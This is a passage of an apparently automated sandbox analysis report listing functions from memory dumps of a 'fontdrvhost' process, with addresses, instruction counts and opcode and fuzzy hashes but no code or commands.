                                                                                                                    • Instruction Fuzzy Hash: 53C18E30A18656CBEB19CF04C4E05B537A1FF46305B6446BDD94ACB68FDA3CE881DB51
                                                                                                                    Function 00007FFD3494949F Relevance: .3, Instructions: 312COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e6e0a77ec54c7a89a6adb00b0ee0dd823800eff4646d257b296df585425b776
                                                                                                                    • Instruction ID: e2099fa4c2614ca5cd466189c913817df085d7bf7c985a778fa8b5045f5a1597
                                                                                                                    • Opcode Fuzzy Hash: 8e6e0a77ec54c7a89a6adb00b0ee0dd823800eff4646d257b296df585425b776
                                                                                                                    • Instruction Fuzzy Hash: 50C17E306295568BEB09CF28C4E05B13BA5FF46310B5446BDC98ACB68FDA3CE842DF51
                                                                                                                    Function 00007FFD34946797 Relevance: .3, Instructions: 311COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 59973a46f5c79d70f8dba67da8e20897a40778c640cd7ba84671b69d23717f6f
                                                                                                                    • Instruction ID: f60172b59830902ae90f7eed967ba80f57069c314b36bee012ab8964c4cf0cf2
                                                                                                                    • Opcode Fuzzy Hash: 59973a46f5c79d70f8dba67da8e20897a40778c640cd7ba84671b69d23717f6f
                                                                                                                    • Instruction Fuzzy Hash: 6B21F896F0C69786F669AEA9A4B21FC56405F53324F18017FD24ED12EBCC4C3C8572B2
                                                                                                                    Function 00007FFD3494B8B7 Relevance: .3, Instructions: 304COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0cdb3598e9860f5f535a1a126cc383cfff69c2f1a0f631742911af5462565f14
                                                                                                                    • Instruction ID: 225dfc589880f7e9362b46674a23c31521c7d768bbef1e7266cc43570552be6b
                                                                                                                    • Opcode Fuzzy Hash: 0cdb3598e9860f5f535a1a126cc383cfff69c2f1a0f631742911af5462565f14
                                                                                                                    • Instruction Fuzzy Hash: 8E219E12F0D1938EF679A669A8F61FC26809F56360F1805BED74DD62CEDC0C688173A2
                                                                                                                    Function 00007FFD34948D32 Relevance: .3, Instructions: 301COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ebcdc2c492d3032854ceea489e5ce496aad5eefc95c5d0bd4e3a3b174805c69
                                                                                                                    • Instruction ID: 3904480fd9ce13ea80fb35f9180bb8008f6f015506304efc118d47d8e67d133b
                                                                                                                    • Opcode Fuzzy Hash: 5ebcdc2c492d3032854ceea489e5ce496aad5eefc95c5d0bd4e3a3b174805c69
                                                                                                                    • Instruction Fuzzy Hash: 85B18F34B1CA469FE749DB28C0A06A5B7A1FF59300F5441BDD14EC7B8ADB28F851CBA1
                                                                                                                    Function 00007FFD3494136D Relevance: .3, Instructions: 296COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7329a03e9a772bf7a479ab5feee0aeacc5b44f5e16255f7a98e73773a3666a74
                                                                                                                    • Instruction ID: a6c586556cdc6de16c8f37296b6c1fa6089612fd7d1f567b05ca9b52392a5408
                                                                                                                    • Opcode Fuzzy Hash: 7329a03e9a772bf7a479ab5feee0aeacc5b44f5e16255f7a98e73773a3666a74
                                                                                                                    • Instruction Fuzzy Hash: 5521E112F1C5938BF235DA6B94FA1F85A905F13324F18027ED68ED66CADD0C784573A2
                                                                                                                    Function 00007FFD34946428 Relevance: .3, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 500255a238e7d1a254389bf21809946928dd06a0cd37762252fa476f7b685a19
                                                                                                                    • Instruction ID: f24cc053e0ba09c4d53f494b5176f89a65c7e918e446f8670d2b0d7e36cf2cba
                                                                                                                    • Opcode Fuzzy Hash: 500255a238e7d1a254389bf21809946928dd06a0cd37762252fa476f7b685a19
                                                                                                                    • Instruction Fuzzy Hash: 517146B1B0C54A4FEB68DA18C4A65B437D0EF56310B0002BDD25EC77BADD1CAC1AD7A1
                                                                                                                    Function 00007FFD3494C12B Relevance: .2, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd67c59eae0dcb19f876d7f4a0906ec50ef7a467f95984b3d2bee00f68e9c08f
                                                                                                                    • Instruction ID: 5f631e330937fa2b293552ddd51efbece3f83d8531839e388d79fc5747a91b12
                                                                                                                    • Opcode Fuzzy Hash: fd67c59eae0dcb19f876d7f4a0906ec50ef7a467f95984b3d2bee00f68e9c08f
                                                                                                                    • Instruction Fuzzy Hash: E3719031E1C64A9EEBA5DBA4C4A16BDB7A1FF4A300F51017DD10ED3299DE3CA841E760
                                                                                                                    Function 00007FFD3494700B Relevance: .2, Instructions: 228COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97ef7ae9581bd6aa8a9fbc8169e5d70aa6b16c4dacabf880fa45c272ac6ee418
                                                                                                                    • Instruction ID: 2d54e3243eed13aa54d7f9bacd5e10f046bbf3cf83036d5c30b4e9c692020f96
                                                                                                                    • Opcode Fuzzy Hash: 97ef7ae9581bd6aa8a9fbc8169e5d70aa6b16c4dacabf880fa45c272ac6ee418
                                                                                                                    • Instruction Fuzzy Hash: 1171A231A1D64E8FEB68DBA4C8A1ABD7BA1FF4A300F1005BDD10ED7295DE2C68419761
                                                                                                                    Function 00007FFD34941BDB Relevance: .2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d267d3a3a5bbc860cfb3399a4170e9c99f926f800885bde2cb025a28a2959771
                                                                                                                    • Instruction ID: 3f026fdbdd8fdcf8607f9e5e2d8783ca22b8edf870a3fd61cb257eb1c7368421
                                                                                                                    • Opcode Fuzzy Hash: d267d3a3a5bbc860cfb3399a4170e9c99f926f800885bde2cb025a28a2959771
                                                                                                                    • Instruction Fuzzy Hash: C371A130E1C64A8FEBA5DB64C8AA6BDBBA1FF46300F14057ED10ED7295DA2C6841E710
                                                                                                                    Function 00007FFD34943ADE Relevance: .2, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d9673e3b93d72dce6067f0ad3bb9cdd71d1fba3a9e24aeb0d78eb3f8f59d11ee
                                                                                                                    • Instruction ID: 9fb00d6693e4cfc5f38db1846439de20d2c9fe4ac50afb9a0f414085c090a837
                                                                                                                    • Opcode Fuzzy Hash: d9673e3b93d72dce6067f0ad3bb9cdd71d1fba3a9e24aeb0d78eb3f8f59d11ee
                                                                                                                    • Instruction Fuzzy Hash: 6461953070CA469FD769DF28C0A1664B7A1BF1A300F9441BDC94EC778ADB2CB851DB91
                                                                                                                    Function 00007FFD3494AAE7 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b55a32e4fe95e5f8e52d275f208b58048c60964f46f8c707d8a2ec40c2bf996
                                                                                                                    • Instruction ID: 06937715c1d1a3c59e686e228ab494d333fd6b008573974de1b46f4f17d4d570
                                                                                                                    • Opcode Fuzzy Hash: 7b55a32e4fe95e5f8e52d275f208b58048c60964f46f8c707d8a2ec40c2bf996
                                                                                                                    • Instruction Fuzzy Hash: 90415F32A0C9588FDF98EF18C4A69A5B3E1FB69311714017ED04AC3296DE35F845CB81
                                                                                                                    Function 00007FFD34945737 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 895cbb173c071cff7175e86370a2695b657e54ab265547ef7b91d08eb41e4495
                                                                                                                    • Instruction ID: c5b6f8c2fbbaccdf64626ac65c0d7b12508ddd3ac7409ef2fb7cf8fd0c26ba3c
                                                                                                                    • Opcode Fuzzy Hash: 895cbb173c071cff7175e86370a2695b657e54ab265547ef7b91d08eb41e4495
                                                                                                                    • Instruction Fuzzy Hash: 6F416E3260C9088FDF98EF58C4A59A5B3E1FBA9320B04057ED14ED3682CE35EC45CB81
                                                                                                                    Function 00007FFD349457E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ff6c84e296b632b72b6be55fca87e533251e7834d8857768a931772dc8a1c99
                                                                                                                    • Instruction ID: 97edf4b87383abd3bddb35cba3ceab7d6b70f7bb0af691ea763b006d9febea4a
                                                                                                                    • Opcode Fuzzy Hash: 4ff6c84e296b632b72b6be55fca87e533251e7834d8857768a931772dc8a1c99
                                                                                                                    • Instruction Fuzzy Hash: 27317E3160C9488FDB98EF28C0A5AA5B3E1FF6931071406AEE44ED7292CE35FC45CB81
                                                                                                                    Function 00007FFD3494AB91 Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7a98fc106879bc78877695624adc1aca80d3bbd56767544ae005259ad8fe2cb4
                                                                                                                    • Instruction ID: f5a8878339f4a5f54744bf9ba2cece55b83971a5949972d4544b1ab341f691bb
                                                                                                                    • Opcode Fuzzy Hash: 7a98fc106879bc78877695624adc1aca80d3bbd56767544ae005259ad8fe2cb4
                                                                                                                    • Instruction Fuzzy Hash: 8931913160C9588FCB99EF18C4A6D65B3E1FB6931171406BED04AC7296CE35FC45CB82
                                                                                                                    Function 00007FFD34550908 Relevance: .1, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction ID: eb23a2195217ed3b6ea7875d536c5ffccbdbbb620212bb756adc30465ed230ba
                                                                                                                    • Opcode Fuzzy Hash: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction Fuzzy Hash: C221B43170C8184FE768EB1CE88ADB973D1EB9A32171501BAE58FC7166E911EC8287C5
                                                                                                                    Function 00007FFD3494AB2B Relevance: .1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 66cd89b4d8c66ee9fd1efec0ac9067bffc1501651cd85e10a7fb90d75d3baf62
                                                                                                                    • Instruction ID: 24e063eeea7322c2c50af8217396f5466d6038e8a86e464e963a15e3e51b9666
                                                                                                                    • Opcode Fuzzy Hash: 66cd89b4d8c66ee9fd1efec0ac9067bffc1501651cd85e10a7fb90d75d3baf62
                                                                                                                    • Instruction Fuzzy Hash: F1316E3160C9498FDF98EF18C4A6AA5B3E1FB6971171406BED04AC7296CE35F845CB82
                                                                                                                    Function 00007FFD3494577B Relevance: .1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 77602723bedb0db80ec074eabb2c8d4b09e34adcf48a1ccd97b8339f77b4a292
                                                                                                                    • Instruction ID: de84bf5040dfc9ae41e1fe4bcd43d27d9fa28296ac58a6aa4a299f83732b21b2
                                                                                                                    • Opcode Fuzzy Hash: 77602723bedb0db80ec074eabb2c8d4b09e34adcf48a1ccd97b8339f77b4a292
                                                                                                                    • Instruction Fuzzy Hash: EB314D316089498FDB98EF28C0A5AA5B3E1FB6931071406AEE04AD7692CE35EC45CB81
                                                                                                                    Function 00007FFD34551171 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bea367d92eaa35eb07e3c5c9b52f8eaffa1f6e5a5fe0a2c98c53f0fd92b268e6
                                                                                                                    • Instruction ID: 1fef210b747af1852ecb533f87e654406c04439dbd7308b90a2ad790f68fe22e
                                                                                                                    • Opcode Fuzzy Hash: bea367d92eaa35eb07e3c5c9b52f8eaffa1f6e5a5fe0a2c98c53f0fd92b268e6
                                                                                                                    • Instruction Fuzzy Hash: A1317231E0C68A8FDB46EB64C8A59B97BF0EF57310B0405FBD00AD7193DA2CA845C751
                                                                                                                    Function 00007FFD3494A8F5 Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1cbb5d0bc7311ce933fadfcf940051edfcc61297f517d9777c0796aeb49cda5c
                                                                                                                    • Instruction ID: 849651bc8c7751fdb227b36a22ce9e3dedd904082b23e8e5c0cba0e241d4a9f6
                                                                                                                    • Opcode Fuzzy Hash: 1cbb5d0bc7311ce933fadfcf940051edfcc61297f517d9777c0796aeb49cda5c
                                                                                                                    • Instruction Fuzzy Hash: 6A314830A1C95ACFEB98DBD4C4A26BD77A0FF45300F62017ED20ED6285DA3CA800A751
                                                                                                                    Function 00007FFD34945545 Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd6fee1e818360ad66a0b4d5346ed7b73dcecadebba50ba1c4310ce629b088ba
                                                                                                                    • Instruction ID: 1cb19bb5fb333e06c96ccd4c3266cff74cf01adfcf9bf5a9b5bf0ac7b98c193f
                                                                                                                    • Opcode Fuzzy Hash: fd6fee1e818360ad66a0b4d5346ed7b73dcecadebba50ba1c4310ce629b088ba
                                                                                                                    • Instruction Fuzzy Hash: AB311530A1854ACFEBD8DF84C4A55BD77B2FF46310F60017AE60ED6285DE3CA900AB61
                                                                                                                    Function 00007FFD34944431 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e7492f0997ec06894da6b322722996e5017b9cf064e1e06945ba88a14db4c755
                                                                                                                    • Instruction ID: 7f6bd4f3015278085f89c5c742ce0877e968edfeeb74836dd1b456f88a76c220
                                                                                                                    • Opcode Fuzzy Hash: e7492f0997ec06894da6b322722996e5017b9cf064e1e06945ba88a14db4c755
                                                                                                                    • Instruction Fuzzy Hash: A0312910A1C5D6CAE72AC61884B05747BA1FF4731072946BED68BCB2CBC82CA881A761
                                                                                                                    Function 00007FFD3494BDA2 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cdefac9b74aae521c3192b79ccfe13ee4d8b260c76b3d213cd583aa7aa48ae73
                                                                                                                    • Instruction ID: 8a42a7e23cb86b7d464153b0313f03c720060d96607ee4fac226f3c8d89207c9
                                                                                                                    • Opcode Fuzzy Hash: cdefac9b74aae521c3192b79ccfe13ee4d8b260c76b3d213cd583aa7aa48ae73
                                                                                                                    • Instruction Fuzzy Hash: 21310571E0891D8FDF99DB58C4A5AE9B7B1FF59300F0001BED14EE7295CE39A9418B50
                                                                                                                    Function 00007FFD349497E1 Relevance: .1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05912406babf8ad3dcb5a5c08a23bcf7a422fb11702047a2523fc1e8a80993ed
                                                                                                                    • Instruction ID: 00a02836ed61b7c89cd6cf4ab48407208a691f13da282956b752eb26bf3e2530
                                                                                                                    • Opcode Fuzzy Hash: 05912406babf8ad3dcb5a5c08a23bcf7a422fb11702047a2523fc1e8a80993ed
                                                                                                                    • Instruction Fuzzy Hash: F731E510A1C5974BE729C328C8B45B47BA5EF533217184ABEC186CB78BC42CB886EF51
                                                                                                                    Function 00007FFD34946C82 Relevance: .1, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 255db5591f2b25b65f74561d5454ba28b5f0a6302ce67288ad420cb21e2366b6
                                                                                                                    • Instruction ID: 0796c87ac6bc01d25f7f06440f41b2d2cc7f4f5697013f44bee206c2d731445d
                                                                                                                    • Opcode Fuzzy Hash: 255db5591f2b25b65f74561d5454ba28b5f0a6302ce67288ad420cb21e2366b6
                                                                                                                    • Instruction Fuzzy Hash: 5F31EB71E0891D8FCF98DB18C4A5AE9B7B1EB59300F4441BDD14EE72A5CE39AD418B40
                                                                                                                    Function 00007FFD34550C25 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64baffa4a49a3c20d947b1b5bce7d33a092b58b6efe707d8eea59877bf1d477a
                                                                                                                    • Instruction ID: d90f82451b425d0da959794ba6a4861aa8b7af3b37e38531cbe1be7806ec3833
                                                                                                                    • Opcode Fuzzy Hash: 64baffa4a49a3c20d947b1b5bce7d33a092b58b6efe707d8eea59877bf1d477a
                                                                                                                    • Instruction Fuzzy Hash: BB21F337F0D2599FE712A76898620ECBBB0EF43320F0441F3D249CA093D93CA9469781
                                                                                                                    Function 00007FFD34947D4E Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b134640f3158fc816201f04cc7e2c6819d356ea597545e6460c08169bb8d3d7c
                                                                                                                    • Instruction ID: 85c271121c3fc54434ae899b862bb0c2a2210c3b86abbeb4ee9afa940ce0015f
                                                                                                                    • Opcode Fuzzy Hash: b134640f3158fc816201f04cc7e2c6819d356ea597545e6460c08169bb8d3d7c
                                                                                                                    • Instruction Fuzzy Hash: 4A21F321F2D54E4FEB59E66898B62B8B7A1EF46310F1401BED10EC37C6DD1CA8069361
                                                                                                                    Function 00007FFD34940D01 Relevance: .1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2b057a1fbe74acf6ebabca789a3fa6672766f5b76648fb7120af4763e8bfde11
                                                                                                                    • Instruction ID: ad156a57a086aa4f41bc9e6573d3d04d694a003f77353341fc06dcc545d09b39
                                                                                                                    • Opcode Fuzzy Hash: 2b057a1fbe74acf6ebabca789a3fa6672766f5b76648fb7120af4763e8bfde11
                                                                                                                    • Instruction Fuzzy Hash: F2219D30E1CA4E9FDB94DB58C8A05FDBBB1FF59300F51007AD10AE3282DA3868099B54
                                                                                                                    Function 00007FFD34943015 Relevance: .1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
